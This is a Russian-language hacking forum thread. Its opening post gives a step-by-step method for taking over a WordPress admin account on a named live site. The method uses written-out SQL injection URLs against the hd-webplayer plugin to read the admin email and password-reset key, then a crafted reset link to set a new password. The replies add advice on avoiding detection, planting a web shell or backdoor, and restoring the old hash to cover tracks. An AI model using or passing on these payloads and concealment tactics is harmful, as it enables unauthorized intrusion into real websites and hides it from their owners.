Приветствую. Решил написать небольшую заметку. Как вы знаете чтобы зайти в админ-панель Wordpress, нужно расшифровать хэш администратора. Но я понял как входить в панель без ожидания расшифровки хэша. Покажу на примере. У нас есть блог, где мы уже вывели данные из таблицы wp_users. Торопится выводить пароль не стоит, выведем e-mail администратора: Code: http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users-- И результат запроса: Так. Теперь идем на страницу авторизации wp-login.php, и переходим на страницу восстановления пароля (В нашем случае Passwort vergessen). Вводим e-mail администратора который мы получили выше, и отправляем письмо. Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД. Делаем такой запрос: Code: http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users-- И в результате мы получаем активационный код: Теперь идем на страницу сброса пароля (При этом заполнив параметры): Code: www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=admin И мы видим что нам предлагают ввести новый пароль, вводим, и меняем. Далее привычная авторизация. Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail(). Способ работает не везде. (с) MaxFast
работает на всех версиях, нужна только раскрученная sql инъекция или доступ к БД. единственное что факт взлома скорее всего заметят..
Он может его и не прочитать, как повезет.Но если оставить как написано в первом посте, факт обнаружения выше.
Хм спасибо извлек для себя новое)А по поводу палева-если цель не очень то может и админ оказаться не совсем компетентным просто вернуть пасс обратно и забэкдорить какой нить скрипт авось и не заметит) А если какойнибудь крупный сайт то тут уж и денег не жалко ящик его проспамить. Лови +++
Данный способ подходит для большого числа CMS и движков, за исключением тех, которые высылают на e-mail сам пароль.
Отчего же? заливаем шелл, в бд меняем наш хеш админа на старый Ну кто то узнал мейл и пытался восстановить пароль. Что такого то? Там же вряд ли приходит новый пасс
Дело не в нем. Каждая БД вордпресса хранит одни и те же поля. Просто этот блог самый первый с SQLi попался.
Что поля одинаковые это понятно, но дырявый скрипт находится в этом плагине. Так? Ты ведь не можешь провести injaction через другой скрипт.
да ты гений прям. тут описывается не инжект в плагины, а реализация входа через "окно" в админку WP. Как ты будешь проводить injEction - дело десятое.
Но ведь такой метод можно реализовать и на другой cms не обязательно wp, а автор описывает именно как баг wp. А без инжекта ты воспользоваться этим способом не сможешь в принципе, так что он далеко не последнее дело.
Суть этой статьи в том, чтобы показать как обойти расшифровку пароля на Wordpress. Тут совершенно неважно какая бага, тут только прочитать данные из поля нужно, и все.
